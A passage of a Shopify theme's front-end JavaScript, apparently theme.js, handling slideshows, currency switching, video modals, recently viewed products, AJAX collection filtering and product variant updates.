                    $(slideshowSelector).slick('slickPlay');
                } else {
                    this.$pause.addClass(classes.isPaused);
                    $(slideshowSelector).slick('slickPause');
                }
            },

            // Helpers
            _getSlideshowId: function($el) {
                return '#Slideshow-' + $el.data('id');
            },
            _activeSlide: function() {
                return this.$slideshow.find('.slick-active');
            },
            _currentSlide: function() {
                return this.$slideshow.find('.slick-current');
            },
            _nextSlide: function(index) {
                return this.$slideshow.find('.slideshow__slide[data-slick-index="' + index + '"]');
            },

            // a11y fixes
            _a11y: function() {
                var $list = this.$slideshowList;
                var autoplay = this.settings.autoplay;

                if (!$list) {
                    return;
                }

                // Remove default Slick aria-live attr until slider is focused
                $list.removeAttr('aria-live');

                // When an element in the slider is focused
                // pause slideshow and set aria-live
                $(classes.wrapper).on('focusin', function(evt) {
                    if (!$(classes.wrapper).has(evt.target).length) {
                        return;
                    }

                    $list.attr('aria-live', 'polite');
                    if (autoplay) {
                        this._pause();
                    }
                }.bind(this));

                // Resume autoplay
                $(classes.wrapper).on('focusout', function(evt) {
                    if (!$(classes.wrapper).has(evt.target).length) {
                        return;
                    }

                    $list.removeAttr('aria-live');
                    if (autoplay) {
                        this._play();
                    }
                }.bind(this));
            },

            // Make sure lazyloading works on cloned slides
            _clonedLazyloading: function() {
                var $slideshow = this.$slideshow;

                $slideshow.find('.slick-slide').each(function(index, el) {
                    var $slide = $(el);
                    if ($slide.hasClass('slick-cloned')) {
                        var slideId = $slide.data('id');
                        var $slideImg = $slide.find('.hero__image').removeClass('lazyloading').addClass('lazyloaded');

                        // Get inline style attribute from non-cloned slide with arbitrary timeout
                        // so the image is loaded
                        setTimeout(function() {
                            var loadedImageStyle = $slideshow.find('.slideshow__slide--' + slideId + ':not(.slick-cloned) .hero__image').attr('style');

                            if (loadedImageStyle) {
                                $slideImg.attr('style', loadedImageStyle);
                            }

                        }, this.settings.autoplaySpeed / 1.5);

                    }
                }.bind(this));
            }
        });

        return slideshow;
    })();

    theme.announcementBar = (function() {
        var slideCount = 0;
        var compact = false;
        var defaults = {
            accessibility: true,
            arrows: false,
            dots: false,
            autoplay: true,
            autoplaySpeed: 5000,
            touchThreshold: 20,
            slidesToShow: 1
        };
        var $slider;

        function init() {
            $slider = $('#AnnouncementSlider');
            if (!$slider.length) {
                return;
            }

            slideCount = $slider.data('block-count');
            compact = $slider.data('compact-style');

            var desktopOptions = $.extend({}, defaults, {
                slidesToShow: compact ? 1 : slideCount,
                slidesToScroll: 1
            });

            var mobileOptions = $.extend({}, defaults, {
                slidesToShow: 1
            });

            if (theme.config.bpSmall) {
                initSlider($slider, mobileOptions);
            } else {
                initSlider($slider, desktopOptions);
            }

            $('body').on('matchSmall', function() {
                initSlider($slider, mobileOptions);
            }.bind(this));

            $('body').on('matchLarge', function() {
                initSlider($slider, desktopOptions);
            }.bind(this));
        }

        function initSlider($slider, args) {
            if (isInitialized($slider)) {
                $slider.slick('unslick');
            }
            $slider.slick(args);
        }

        function isInitialized($slider) {
            return $slider.length && $slider.hasClass('slick-initialized');
        }

        // Go to slide if selected in the editor
        function onBlockSelect(id) {
            var $slide = $('#AnnouncementSlide-' + id);
            if ($slider.length) {
                $slider.slick('slickPause');
            }
            if ($slide.length) {
                $slider.slick('slickGoTo', $slide.data('index'));
            }
        }

        function onBlockDeselect(id) {
            if ($slider.length && isInitialized($slider)) {
                $slider.slick('slickPlay');
            }
        }

        function unload() {
            if (isInitialized($slider)) {
                $slider.slick('unslick');
            }
        }

        return {
            init: init,
            onBlockSelect: onBlockSelect,
            onBlockDeselect: onBlockDeselect,
            unload: unload
        };
    })();

    theme.currencySwitcher = (function() {

        var selectors = {
            dataDiv: '#CurrencyData',
            picker: '.currency-input'
        };

        var data = {};

        function init() {
            var $dataDiv = $(selectors.dataDiv);

            if (!$dataDiv.length) {
                return;
            }

            $primaryPicker = $('#CurrencyPicker-header');
            $drawerPicker = $('#CurrencyPicker-drawer');

            // Keep all currency pickers in sync
            $primaryPicker.on('change', function() {
                $drawerPicker.val($(this).val());
            });

            $drawerPicker.on('change', function() {
                $primaryPicker.val($(this).val());
            });

            data = {
                currency: $dataDiv.data('shop-currency'),
                default: $dataDiv.data('default-currency'),
                format: $dataDiv.data('format'),
                moneyFormat: $dataDiv.data('money-format'),
                moneyCurrencyFormat: $dataDiv.data('money-currency-format')
            };

            Currency.format = data.format;

            // Rely on the shop's currency format, not Shopify defaults (in case merchant changes it)
            Currency.money_format[data.currency] = data.moneyFormat;
            Currency.money_with_currency_format[data.currency] = data.moneyCurrencyFormat;

            // Fix for customer account page
            $('span.money span.money').each(function() {
                $(this).parents('span.money').removeClass('money');
            });

            // Save current price
            $('span.money').each(function() {
                $(this).attr('data-currency-' + data.currency, $(this).html());
            });

            checkCookie();

            $(selectors.picker).val(Currency.currentCurrency).on('change', refresh);
        }

        function syncPickers() {

        }

        function refresh() {
            var newCurrency = $(selectors.picker).val();
            Currency.convertAll(Currency.currentCurrency, newCurrency);
        }

        function ajaxrefresh() {
            var newCurrency = $(selectors.picker).val();
            // Ajax cart always returns shop's currency, not what theme settings defines
            Currency.convertAll(data.currency, newCurrency);
        }

        function checkCookie() {
            var cookieCurrency = Currency.cookie.read();

            if (cookieCurrency == null) {
                if (data.currency !== data.default) {
                    Currency.convertAll(data.currency, data.default);
                }
                else {
                    Currency.currentCurrency = data.default;
                }
            } else if ($(selectors.picker).length && $(selectors.picker).find('option[value=' + cookieCurrency + ']').length === 0) {
                // If the cookie value does not correspond to any value in the currency dropdown
                Currency.currentCurrency = data.currency;
                Currency.cookie.write(data.currency);
            }
            else if (cookieCurrency === data.currency) {
                Currency.currentCurrency = data.currency;
            }
            else {
                Currency.convertAll(data.currency, cookieCurrency);
            }
        }

        return {
            init: init,
            refresh: refresh,
            ajaxrefresh: ajaxrefresh
        };
    })();

    theme.initQuickShop = function(reinit) {
        var ids = [];
        var $buttons = $('.quick-product__btn');

        $buttons.each(function() {
            var id = $(this).data('product-id');
            var modalId = 'QuickShopModal-' + id;
            var name = 'quick-modal-' + id;

            // If another identical modal exists, remove duplicates
            if (ids.indexOf(id) > -1) {
                $('.modal--quick-shop[data-product-id="'+ id +'"]').each(function(i) {
                    if (i > 0) {
                        $(this).remove();
                    }
                });
                return;
            }

            new theme.Modals(modalId, name);
            ids.push(id);
        });
    };

    theme.videoModal = function() {
        var videoModalPlayer = null;
        var videoOptions = {
            width: 1280,
            height: 720,
            playerVars: {
                autohide: 0,
                autoplay: 1,
                branding: 0,
                cc_load_policy: 0,
                fs: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                playsinline: 1,
                quality: 'hd720',
                rel: 0,
                showinfo: 0,
                wmode: 'opaque'
            }
        };

        var selectors = {
            triggers: 'a[href*="youtube.com/watch"], a[href*="youtu.be/"]'
        };

        if (!$(selectors.triggers).length) {
            return;
        }

        var modal = new theme.Modals('VideoModal', 'video-modal', {
            closeOffContentClick: true,
            solid: true
        });

        $(selectors.triggers).on('click', triggerYouTubeModal);

        function triggerYouTubeModal(evt) {
            evt.preventDefault();
            window.loadYouTube();

            if (theme.config.youTubeReady) {
                startVideoOnClick(evt);
            } else {
                $('body').on('youTubeReady', function() {
                    startVideoOnClick(evt);
                });
            }
        }

        function startVideoOnClick(evt) {
            var $el = $(evt.target);

            // get video ID from URL
            var videoId = getYoutubeVideoId($el.attr('href'));

            var args = $.extend({}, videoOptions, {
                videoId: videoId
            });

            // Disable plays inline on mobile
            args.playerVars.playsinline = theme.config.bpSmall ? 0 : 1;

            var videoModalPlayer = new YT.Player('VideoHolder', args);
            modal.open();

            $('body').on('modalClose.VideoModal', function() {
                // Slight timeout so it is destroyed after the modal closes
                setTimeout(function() {
                    videoModalPlayer.destroy();
                }, 500); // modal close css transition
            });
        }

        function getYoutubeVideoId(url) {
            var regExp = /^.*((youtu.be\/)|(v\/)|(\/u\/\w\/)|(embed\/)|(watch\?))\??v?=?([^#\&\?]*).*/;
            var match = url.match(regExp);
            return (match&&match[7].length==11)? match[7] : false;
        }
    };


    theme.RecentlyViewed = (function() {
        var selectors = {
            template: '#RecentlyViewedProduct',
            outputContainer: '#RecentlyViewed-'
        };

        var init = false;

        function RecentlyViewed(container) {
            var $container = this.$container = $(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');
            this.namespace = '.recently-viewed' + sectionId;

            if (!$(selectors.template).length) {
                return;
            }

            // Lazyload API
            this.checkVisibility();
            $(window).on('scroll' + this.namespace, $.throttle(200, this.checkVisibility.bind(this)));
        };

        RecentlyViewed.prototype = $.extend({}, RecentlyViewed.prototype, {
            init: function() {
                if (init) {
                    return;
                }

                init = true;

                if ($.isEmptyObject(theme.recentlyViewed.recent)) {
                    // No previous history on page load, so bail
                    return;
                }

                this.outputContainer = $(selectors.outputContainer + this.sectionId);
                this.handle = this.$container.attr('data-product-handle');

                // Request new product info via JS API
                var promises = [];
                for (handle in theme.recentlyViewed.recent) {
                    promises.push(this.getProductInfo(handle));
                }

                Promise.all(promises).then(function(result) {
                    this.setupOutput(result);
                    this.captureProductDetails(result);
                }.bind(this), function(error) {
                    console.log('Theme | recently viewed products failed to load');
                    console.log(error);
                });
            },

            checkVisibility: function() {
                if (theme.isElementVisible(this.$container, 600)) {
                    this.init();
                    $(window).off('scroll' + this.namespace);
                }
            },

            getProductInfo: function(handle) {
                return new Promise(function(resolve, reject) {
                    if (theme.recentlyViewed.productInfo.hasOwnProperty(handle)) {
                        resolve(theme.recentlyViewed.productInfo[handle]);
                    } else {
                        jQuery.getJSON('/products/'+ handle +'.js', function(product) {
                            resolve(product);
                        });
                    }
                });
            },

            setupOutput: function(products) {
                var allProducts = [];
                var data = {};
                var limit = this.$container.attr('data-recent-count');

                var i = 0;
                for (key in products) {
                    var product = products[key];
                    // Ignore current product
                    if (product.handle === this.handle) {
                        continue;
                    }

                    i++;

                    // New or formatted properties
                    product.url_formatted = theme.recentlyViewed.recent[product.handle] ? theme.recentlyViewed.recent[product.handle].url : product.url;
                    product.image_responsive_url = theme.recentlyViewed.recent[product.handle].featuredImage;
                    product.image_aspect_ratio = theme.recentlyViewed.recent[product.handle].aspectRatio;
                    product.on_sale = product.compare_at_price > product.price;
                    product.sold_out = !product.available;
                    product.price_formatted = theme.Currency.formatMoney(product.price, theme.settings.moneyFormat);
                    product.compare_at_price_formatted = theme.Currency.formatMoney(product.compare_at_price, theme.settings.moneyFormat);
                    product.price_min_formatted = theme.Currency.formatMoney(product.price_min, theme.settings.moneyFormat);
                    product.money_saved = theme.Currency.formatMoney((product.compare_at_price - product.price), theme.settings.moneyFormat);

                    allProducts.unshift(product);
                }

                data = {
                    items: allProducts.slice(0, limit),
                    grid_item_width: this.$container.attr('data-grid-item-class')
                };

                if (allProducts.length === 0) {
                    return;
                }

                // Prep handlebars template
                var source = $(selectors.template).html();
                var template = Handlebars.compile(source);
                this.outputContainer.append(template(data));

                if (AOS) {
                    AOS.refreshHard();
                }
            },

            captureProductDetails: function(products) {
                for (var i = 0; i < products.length; i++) {
                    var product = products[i];
                    theme.recentlyViewed.productInfo[product.handle] = product;
                }

                // Add data to session storage to reduce API requests later
                if (theme.config.hasSessionStorage) {
                    sessionStorage.setItem('recent-products', JSON.stringify(theme.recentlyViewed.productInfo));
                }
            },

            onUnload: function() {
                init = false;
                $('window').off(this.namespace);
            }
        });

        return RecentlyViewed;
    })();

    theme.parallaxSections = {};

    theme.Parallax = (function() {
        var speed = 7; // higher is slower

        function parallax(el, args) {
            this.$container = $(el);
            this.namespace = args.namespace;

            if (!this.$container.length) {
                return;
            }

            if (args.desktopOnly) {
                this.desktopInit();
            } else {
                this.init(this.$container, args)
            }
        }

        parallax.prototype = $.extend({}, parallax.prototype, {
            init: function(desktopOnly) {
                var $window = this.$window = $(window);
                var elTop = this.$container.offset().top;

                $window.on('scroll' + this.namespace, function(evt) {
                    var scrolled = $window.scrollTop();
                    var shiftDistance = (elTop - scrolled) / speed;
                    this.$container.css({
                        'transform': 'translate3d(0, ' + shiftDistance + 'px, 0)'
                    });
                }.bind(this));

                // Reinit on resize
                $window.on('resize' + this.namespace, $.debounce(350, function() {
                    $window.off(this.namespace);

                    if (desktopOnly) {
                        if (!theme.config.bpSmall) {
                            this.init(true);
                            return;
                        }
                    }

                    this.init();
                }.bind(this)));
            },

            desktopInit: function() {
                if (!theme.config.bpSmall) {
                    this.init(true);
                }

                $('body').on('matchSmall', function() {
                    this.destroy();
                }.bind(this));

                $('body').on('matchLarge', function() {
                    this.init(true);
                }.bind(this));
            },

            destroy: function() {
                this.$container.removeAttr('style');
                this.$window.off(this.namespace);
            }
        });

        return parallax;
    })();


    theme.collectionTemplate = (function() {
        var isAnimating = false;

        var selectors = {
            collectionGrid: '.grid--collection',
            sidebar: '#CollectionSidebar',
            tags: '.tag-list a',
            removeTag: '.tag--remove a'
        };

        var settings = {
            combineTags: $(selectors.sidebar).data('combine-tags')
        };

        var classes = {
            activeTag: 'tag--active'
        };

        function init() {
            // Ajax pagination
            $(window).on('popstate', function(state) {
                if (state) {
                    getNewCollectionContent(location.href);
                }
            });

            initTagClicks();
        }

        function initTagClicks() {
            $('body').on('click', selectors.tags, function(evt) {
                if (theme.FilterDrawer) {
                    theme.FilterDrawer.close();
                }

                if ($(this).hasClass('no-ajax')) {
                    return;
                }

                evt.preventDefault();
                if (isAnimating) {
                    return;
                }

                isAnimating = true;

                var $el = $(evt.currentTarget);
                var $parent = $el.parent();
                var newUrl = $el.attr('href');

                if (settings.combineTags) {
                    if ($parent.hasClass(classes.activeTag)) {
                        $parent.removeClass(classes.activeTag);
                    } else {
                        $parent.addClass(classes.activeTag);
                    }
                } else {
                    $(selectors.tags).parent().removeClass(classes.activeTag);
                    $parent.addClass(classes.activeTag);
                }

                updateScroll(true);

                history.pushState({}, '', newUrl);
                $(selectors.collectionGrid).addClass('unload');
                getNewCollectionContent(newUrl);
            });

            // Immediately remove the remove tag button before ajax kicks in
            $('body').on('click', selectors.removeTag, function() {
                $(this).parent('li').remove();
            });
        }

        function updateScroll(animate) {
            var scrollTo;
            if (theme.config.bpSmall) {
                scrollTo = $('.collection-filter').offset().top - 10;
            } else {
                scrollTo = $('#CollectionAjaxResult').offset().top + 1;
            }

            if (theme.config.stickyHeader) {
                var heightOfStickyNav = $('.site-header').outerHeight(true);
                scrollTo = scrollTo - heightOfStickyNav;
            }

            if (animate) {
                $('html, body').animate({ scrollTop: scrollTo }, 300);
            } else {
                $('html, body').scrollTop(scrollTo);
            }
        }

        function getNewCollectionContent(url) {
            $('#CollectionAjaxResult').load(url + ' #CollectionAjaxContent', function() {
                isAnimating = false;
                theme.reinitSection('collection-template');
                theme.collectionTemplate.reinit();
            }.bind(this));
        }

        function reinit() {
            settings.combineTags = $(selectors.sidebar).data('combine-tags');

            updateScroll(false);
            initTagClicks();

            AOS.refreshHard();

            // Setup page transition classes
            theme.pageTransitions();

            // Reload quick shop buttons
            theme.initQuickShop(true);

            // Reload products inside each quick shop
            sections.register('product-template', theme.Product);
        }

        return {
            init: init,
            reinit: reinit
        };
    })();

    theme.customerTemplates = (function() {

        function initEventListeners() {
            // Show reset password form
            $('#RecoverPassword').on('click', function(evt) {
                evt.preventDefault();
                toggleRecoverPasswordForm();
            });

            // Hide reset password form
            $('#HideRecoverPasswordLink').on('click', function(evt) {
                evt.preventDefault();
                toggleRecoverPasswordForm();
            });
        }

        /**
         *
         *  Show/Hide recover password form
         *
         */
        function toggleRecoverPasswordForm() {
            $('#RecoverPasswordForm').toggleClass('hide');
            $('#CustomerLoginForm').toggleClass('hide');
        }

        /**
         *
         *  Show reset password success message
         *
         */
        function resetPasswordSuccess() {
            var $formState = $('.reset-password-success');

            // check if reset password form was successfully submitted
            if (!$formState.length) {
                return;
            }

            // show success message
            $('#ResetSuccess').removeClass('hide');
        }

        /**
         *
         *  Show/hide customer address forms
         *
         */
        function customerAddressForm() {
            var $newAddressForm = $('#AddressNewForm');
            var $addressForms = $('.js-address-form');

            if (!$newAddressForm.length || !$addressForms.length) {
                return;
            }

            if (Shopify) {
                $('.js-address-country').each(function() {
                    var $container = $(this);
                    var countryId = $container.data('country-id');
                    var provinceId = $container.data('province-id');
                    var provinceContainerId = $container.data('province-container-id');

                    new Shopify.CountryProvinceSelector(
                        countryId,
                        provinceId,
                        {
                            hideElement: provinceContainerId
                        }
                    );
                });
            }

            // Toggle new/edit address forms
            $('.address-new-toggle').on('click', function() {
                $newAddressForm.toggleClass('hide');
            });

            $('.address-edit-toggle').on('click', function() {
                var formId = $(this).data('form-id');
                $('#EditAddress_' + formId).toggleClass('hide');
            });

            $('.address-delete').on('click', function() {
                var $el = $(this);
                var formId = $el.data('form-id');
                var confirmMessage = $el.data('confirm-message');

                if (confirm(confirmMessage || 'Are you sure you wish to delete this address?')) {
                    Shopify.postLink('/account/addresses/' + formId, {parameters: {_method: 'delete'}});
                }
            });
        }

        /**
         *
         *  Check URL for reset password hash
         *
         */
        function checkUrlHash() {
            var hash = window.location.hash;

            // Allow deep linking to recover password form
            if (hash === '#recover') {
                toggleRecoverPasswordForm();
            }
        }

        return {
            init: function() {
                checkUrlHash();
                initEventListeners();
                resetPasswordSuccess();
                customerAddressForm();
            }
        };
    })();


    theme.Product = (function() {

        var classes = {
            onSale: 'on-sale',
            disabled: 'disabled',
            isModal: 'is-modal',
            loading: 'loading',
            loaded: 'loaded',
            interactable: 'video-interactable',
            zoomInit: 'photo-zoom-init'
        };

        var selectors = {
            productVideo: '.product__video',
            videoParent: '.product__video-wrapper',
            currentSlide: '.slick-current',
            zoomImage: '.photo-zoom-link__initial'
        };

        var youtubeReady;
        var videos = {};
        var youtubePlayers = [];
        var youtubeVideoOptions = {
            height: '480',
            width: '850',
            playerVars :{
                autohide: 0,
                autoplay: 1,
                branding: 0,
                cc_load_policy: 0,
                controls: 0,
                fs: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                playsinline: 1,
                quality: 'hd720',
                rel: 0,
                showinfo: 0,
                wmode: 'opaque'
            },
            events: {
                onReady: onVideoPlayerReady,
                onStateChange: onVideoStateChange
            }
        };

        var vimeoReady;
        var vimeoPlayers = [];
        var vimeoVideoOptions = {
            byline: false,
            title: false,
            portrait: false,
            loop: true
        };

        function onVideoPlayerReady(evt) {
            var $player = evt.target.a ? $(evt.target.a) : $(evt.target.f);
          	
          	// FIX BY SM
          
          	var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
          
          	// END FIX BY SM
          	
            var playerId = $player.attr('id');
            youtubePlayers[playerId] = evt.target; // update stored player
            var player = youtubePlayers[playerId];

            setParentAsLoading($player);

            if (videos[playerId].style === 'muted') {
                youtubePlayers[playerId].mute().playVideo().pauseVideo();
            } else {
                setParentAsLoaded($player);
            }

            // If first slide or only photo, start video
            if ($player.closest(selectors.currentSlide).length || $player.data('image-count') === 1) {
                if (videos[playerId].style === 'muted') {
                    youtubePlayers[playerId].playVideo();
                    initCheckVisibility(playerId);
                }
            }
        }

        function initCheckVisibility(playerId) {
            // Add out of view pausing
            videoVisibilityCheck(playerId);
            $(window).on('scroll.' + playerId, {id: playerId}, $.throttle(150, videoVisibilityCheck));
        }

        function videoVisibilityCheck(id) {
            var playerId;

            if (typeof id === 'string') {
                playerId = id;
            } else {
                // Data comes in as part of the scroll event
                playerId = id.data.id;
            }

            if (theme.isElementVisible($('#' + playerId))) {
                if (videos[playerId] && videos[playerId].style === 'unmuted') {
                    return;
                }
                playVisibleVideo(playerId);
            } else {
                pauseHiddenVideo(playerId);
            }
        }

        function playVisibleVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].playVideo === 'function') {
                youtubePlayers[id].playVideo();
            }
        }

        function pauseHiddenVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].pauseVideo === 'function') {
                youtubePlayers[id].pauseVideo();
            }
        }

        function onVideoStateChange(evt) {
            var $player = evt.target.a ? $(evt.target.a) : $(evt.target.f);
          
          	// FIX BY SM
          
          	var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
          
          	// END FIX BY SM
          
            var playerId = $player.attr('id');
            var player = youtubePlayers[playerId];

            switch (evt.data) {
                case -1: // unstarted
                    // Handle low power state on iOS by checking if
                    // video is reset to unplayed after attempting to buffer
                    if (videos[playerId].attemptedToPlay) {
                        setParentAsLoaded($player);
                        setVideoToBeInteractedWith($player);
                    }
                    break;
                case 0: // ended
                    player.playVideo();
                    break;
                case 1: // playing
                    setParentAsLoaded($player);
                    break;
                case 3: // buffering
                    videos[playerId].attemptedToPlay = true;
                    break;
            }
        }

        function setParentAsLoading($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.loading);
        }

        function setParentAsLoaded($el) {
            $el
                .closest(selectors.videoParent)
                .removeClass(classes.loading)
                .addClass(classes.loaded);
        }

        function setVideoToBeInteractedWith($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.interactable);
        }

        function Product(container) {
            var $container = this.$container = $(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');

            this.inModal = $container.closest('.modal').length;
            this.$modal;

            this.settings = {
                enableHistoryState: $container.data('enable-history-state') || false,
                namespace: '.product-' + sectionId,
                zoom: $container.data('image-zoom') || false,
                inventory: $container.data('inventory') || false,
                modalInit: false,
                lazyLoadModalContent: $container.data('lazyload-content') || false,
                slickMainInitialized: false,
                slickThumbInitialized: false,
                hasImages: true,
                hasMultipleImages: false,
                imageSize: '620x'
            };

            // Overwrite some settings when loaded in modal
            if (this.inModal) {
                this.settings.enableHistoryState = false;
                this.settings.namespace = '.product-' + sectionId + '-modal';
                this.$modal = $('#QuickShopModal-' + sectionId);
            }

            this.selectors = {
                productJson: 'ProductJson-' + sectionId,

                video: 'ProductVideo-' + sectionId,
                photoThumbs: '.product__thumb-' + sectionId,
                thumbSlider: '#ProductThumbs-' + sectionId,
                mainSlider: '#ProductPhotos-' + sectionId,
                productImageMain: '.product-image-main--' + sectionId,

                priceWrapper: '.product__price-wrap-' + sectionId,
                price: '#ProductPrice-' + sectionId,
                comparePrice: '#ComparePrice-' + sectionId,
                savePrice: '#SavePrice-' + sectionId,
                priceA11y: '#PriceA11y-' + sectionId,
                comparePriceA11y: '#ComparePriceA11y-' + sectionId,
                sku: '#Sku-' + sectionId,
                inventory: '#ProductInventory-' + sectionId,

                addToCart: '#AddToCart-' + sectionId,
                addToCartText: '#AddToCartText-' + sectionId,

                originalSelectorId: '#ProductSelect-' + sectionId,
                singleOptionSelector: '.variant__input-' + sectionId,
                variantColorSwatch: '.variant__input--color-swatch-' + sectionId,

                modalFormHolder: '#ProductFormHolder-' + sectionId,
                formContainer: '#AddToCartForm-' + sectionId,
            };

            if (!$('#' + this.selectors.productJson).html()) {
                return;
            }

            this.productObject = JSON.parse(document.getElementById(this.selectors.productJson).innerHTML);

            this.$mainSlider = $(this.selectors.mainSlider);
            this.$thumbSlider = $(this.selectors.thumbSlider);
            this.$firstProductImage = this.$mainSlider.find('img').first();

            if (!this.$firstProductImage.length) {
                this.settings.hasImages = false;
            }

            this.init();
        }

        Product.prototype = $.extend({}, Product.prototype, {
            init: function() {
                if (this.inModal) {
                    this.$container.addClass(classes.isModal);
                    $('body').on('modalOpen.QuickShopModal-' + this.sectionId, this.openModalProduct.bind(this));
                    $('body').on('modalClose.QuickShopModal-' + this.sectionId, this.closeModalProduct.bind(this));
                }

                if (!this.inModal) {
                    this.stringOverrides();
                    this.formSetup();
                    this.productSetup();

                    this.checkIfVideos();
                    this.createImageCarousels();

                    // Add product id to recently viewed array
                    this.addIdToRecentlyViewed();
                }
            },

            formSetup: function() {
                this.initQtySelector();
                this.initAjaxProductForm();
                this.initVariants();
            },

            productSetup: function() {
                this.setImageSizes();
                this.initImageSwitch();
            },

            addIdToRecentlyViewed: function() {
                var handle = this.$container.attr('data-product-handle');
                var url = this.$container.attr('data-product-url');
                var aspectRatio = this.$container.attr('data-aspect-ratio');
                var featuredImage = this.$container.attr('data-img-url');

                // Remove current product if already in set of recent
                if (theme.recentlyViewed.recent.hasOwnProperty(handle)) {
                    delete theme.recentlyViewed.recent[handle];
                }

                // Add it back to the end
                theme.recentlyViewed.recent[handle] = {
                    url: url,
                    aspectRatio: aspectRatio,
                    featuredImage: featuredImage
                };

                $.cookie('theme-recent', JSON.stringify(theme.recentlyViewed.recent), { path: '/', expires: 10000 });
            },

            stringOverrides: function() {
                theme.productStrings = theme.productStrings || {};
                $.extend(theme.strings, theme.productStrings);
            },

            setImageSizes: function() {
                if (!this.settings.hasImages) {
                    return;
                }

                // Get srcset image src, works on most modern browsers
                // otherwise defaults to settings.imageSize
                var currentImage = this.$firstProductImage[0].currentSrc;

                if (currentImage) {
                    this.settings.imageSize = theme.Images.imageSize(currentImage);
                }

                if (this.settings.zoom) {
                    this.settings.imageZoomSize = theme.Images.imageSize(this.$firstProductImage.parent().data('zoom-size'));
                }
            },

            initVariants: function() {
                var options = {
                    $container: this.$container,
                    enableHistoryState: this.settings.enableHistoryState,
                    singleOptionSelector: this.selectors.singleOptionSelector,
                    originalSelectorId: this.selectors.originalSelectorId,
                    product: this.productObject
                };

                if ($(this.selectors.variantColorSwatch).length) {
                    $(this.selectors.variantColorSwatch).on('change', function(evt) {
                        var $el = $(evt.currentTarget);
                        var color = $el.data('color-name');
                        var index = $el.data('color-index');
                        this.updateColorName(color, index);
                    }.bind(this));
                }

                this.variants = new slate.Variants(options);
                this.$container.on('variantChange' + this.settings.namespace, this.updateCartButton.bind(this));
                this.$container.on('variantImageChange' + this.settings.namespace, this.updateVariantImage.bind(this));
                this.$container.on('variantPriceChange' + this.settings.namespace, this.updatePrice.bind(this));
                if ($(this.selectors.sku).length) {
                    this.$container.on('variantSKUChange' + this.settings.namespace, this.updateSku.bind(this));
                }
                if (this.settings.inventory) {
                    this.$container.on('variantChange' + this.settings.namespace, this.updateInventory.bind(this));
                }
            },

            // Variant change functions
            updateColorName: function(color, index) {
                // Updates on radio button change, not variant.js
                $('#VariantColorLabel-' + this.sectionId + '-' + index).text(color);
            },

            updateCartButton: function(evt) {
                var variant = evt.variant;

                if (variant) {
                    if (variant.available) {
                        // Available, enable the submit button and change text
                        $(this.selectors.addToCart).removeClass(classes.disabled).prop('disabled', false);
                        $(this.selectors.addToCartText).html(theme.strings.addToCart);
                    } else {
                        // Sold out, disable the submit button and change text
                        $(this.selectors.addToCart).addClass(classes.disabled).prop('disabled', true);
                        $(this.selectors.addToCartText).html(theme.strings.soldOut);
                    }
                } else {
                    // The variant doesn't exist, disable submit button
                    $(this.selectors.addToCart).addClass(classes.disabled).prop('disabled', true);
                    $(this.selectors.addToCartText).html(theme.strings.unavailable);
                }
            },

            updatePrice: function(evt) {
                var variant = evt.variant;

                if (variant) {
                    // Regular price
                    $(this.selectors.price).html(theme.Currency.formatMoney(variant.price, theme.settings.moneyFormat)).show();

                    // Sale price, if necessary
                    if (variant.compare_at_price > variant.price) {
                        $(this.selectors.comparePrice).html(theme.Currency.formatMoney(variant.compare_at_price, theme.settings.moneyFormat));
                        $(this.selectors.priceWrapper).removeClass('hide');
                        $(this.selectors.price).addClass(classes.onSale);
                        $(this.selectors.comparePriceA11y).attr('aria-hidden', 'false');
                        $(this.selectors.priceA11y).attr('aria-hidden', 'false');

                        var savings = variant.compare_at_price - variant.price;
                        $(this.selectors.savePrice)
                            .removeClass('hide')
                            .html(theme.strings.savePrice.replace('[saved_amount]', theme.Currency.formatMoney(savings, theme.settings.moneyFormat)));
                    } else {
                        $(this.selectors.priceWrapper).addClass('hide');
                        $(this.selectors.price).removeClass(classes.onSale);
                        $(this.selectors.comparePriceA11y).attr('aria-hidden', 'true');
                        $(this.selectors.priceA11y).attr('aria-hidden', 'true');
                        $(this.selectors.savePrice).addClass('hide')
                    }

                    if ($('body').hasClass('currencies-enabled')) {
                        theme.currencySwitcher.ajaxrefresh();
                    }
                }
            },

            updateSku: function(evt) {
                var variant = evt.variant;
                var newSku = '';

                if (variant) {
                    if (variant.sku) {
                        newSku = variant.sku;
                    }

                    $(this.selectors.sku).html(newSku);
                }
            },

            updateInventory: function(evt) {
                var variant = evt.variant;
                var showInventory = false;
                var quantity = 0;
                var $inventoryLabel = $(this.selectors.inventory);

                if (variant && variant.inventory_management === 'shopify') {
                    showInventory = true;
                    quantity = window.inventories[this.sectionId][variant.id];

                    if (quantity === 0 || quantity > 10) {
                        showInventory = false;
                    }
                }

                if (!showInventory) {
                    $inventoryLabel.addClass('hide');
                } else {
                    $inventoryLabel
                        .removeClass('hide')
                        .text(theme.strings.stockLabel.replace('[count]', quantity));
                }
            },

            updateVariantImage: function(evt) {
                var variant = evt.variant;
                var sizedImgUrl = theme.Images.getSizedImageUrl(variant.featured_image.src, this.settings.imageSize);
                var zoomSizedImgUrl;

                if (this.settings.zoom) {
                    zoomSizedImgUrl = theme.Images.getSizedImageUrl(variant.featured_image.src, this.settings.imageZoomSize);
                }

                var $newImage = $('.product__thumb[data-id="' + variant.featured_image.id + '"]');
                var imageIndex = this._slideIndex($newImage.closest('.product__thumb-item'));

                // If there is no index, slider is not initalized
                if (typeof imageIndex === 'undefined') {
                    return;
                }

                this.$mainSlider.slick('slickGoTo', imageIndex);
            },

            // Image/thumbnail toggling
            initImageSwitch: function() {
                if (!$(this.selectors.photoThumbs).length) {
                    return;
                }

                var self = this;

                $(this.selectors.photoThumbs).on('click', function(evt) {
                    evt.preventDefault();
                });
            },

            checkIfVideos: function() {
                var $productVideos = this.$mainSlider.find(selectors.productVideo);

                // Stop if there are 0 videos
                if (!$productVideos.length) {
                    return false;
                }

                var videoTypes = [];

                $productVideos.each(function() {
